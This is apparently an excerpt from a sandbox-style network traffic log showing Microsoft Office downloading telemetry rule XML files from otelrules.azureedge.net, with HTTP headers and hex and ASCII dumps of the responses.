                                                                                                                                                                                                        x-azure-ref: 20241202T063925Z-174f7845968n2hr8hC1EWR9cag00000013pg000000008gmr
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        113192.168.2.84991913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:25 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:26 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                        x-ms-request-id: bdb61e3c-f01e-0099-1ac7-439171000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063926Z-174f7845968cpnpfhC1EWR3afc00000013p0000000007ks3
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        114192.168.2.84992013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:25 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:26 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                        x-ms-request-id: 138fec6a-801e-0067-5044-40fe30000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063926Z-174f7845968j6t2phC1EWRcfe8000000147g000000005eg5
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        115192.168.2.84992113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:25 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:26 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                        x-ms-request-id: 24ac6169-401e-0035-1312-4282d8000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063926Z-174f7845968vqt9xhC1EWRgten000000145g000000002ag8
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        116192.168.2.84992213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:27 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:27 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                        x-ms-request-id: 709a1193-501e-00a3-3559-43c0f2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063927Z-174f78459684bddphC1EWRbht400000013tg000000006drf
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:27 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        117192.168.2.84992313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:27 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:28 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                        x-ms-request-id: 242ec292-a01e-00ab-4ed5-439106000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063928Z-174f78459684bddphC1EWRbht400000013x0000000000crd
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        118192.168.2.84992413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:27 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:28 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                        x-ms-request-id: c562a2d5-001e-0082-3a33-445880000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063928Z-174f7845968frfdmhC1EWRxxbw00000014200000000093bs
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        119192.168.2.84992513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:27 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:28 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                        x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063928Z-174f7845968glpgnhC1EWR7uec00000014a00000000015f2
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        120192.168.2.84992613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:28 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                        x-ms-request-id: 36571fa1-001e-0079-6699-4312e8000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063928Z-174f7845968px8v7hC1EWR08ng000000147g00000000cgvu
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:28 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        121192.168.2.84992713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:29 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:29 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:29 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                        x-ms-request-id: 62ff000c-201e-006e-5b3f-41bbe3000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063929Z-174f7845968pght8hC1EWRyvxg000000078g000000002nha
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
